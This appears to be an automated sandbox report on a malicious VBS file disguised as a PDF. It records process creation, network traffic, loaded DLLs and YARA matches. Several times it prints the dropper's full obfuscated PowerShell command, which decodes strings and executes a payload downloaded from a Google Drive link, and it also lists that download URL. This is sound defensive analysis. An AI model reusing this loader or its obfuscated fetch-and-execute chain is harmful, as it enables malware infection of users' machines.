Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1544405936.00000261612DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1544405936.00000261612DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_P
Source: powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1544405936.0000026160B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1568575285.000002616FA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002615FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544405936.000002616165E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 172.217.12.142:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.72.129:443 -> 192.168.2.8:49707 version: TLS 1.2

System Summary

barindex
Source: amsi64_6500.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6500, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8790
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8790Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgReg
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegJump to behavior
Source: U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_6500.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6500, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@6/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Irreplaceableness.SucJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Miljforstyrrelsen.txtJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: U00b7pdf.vbsReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgReg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
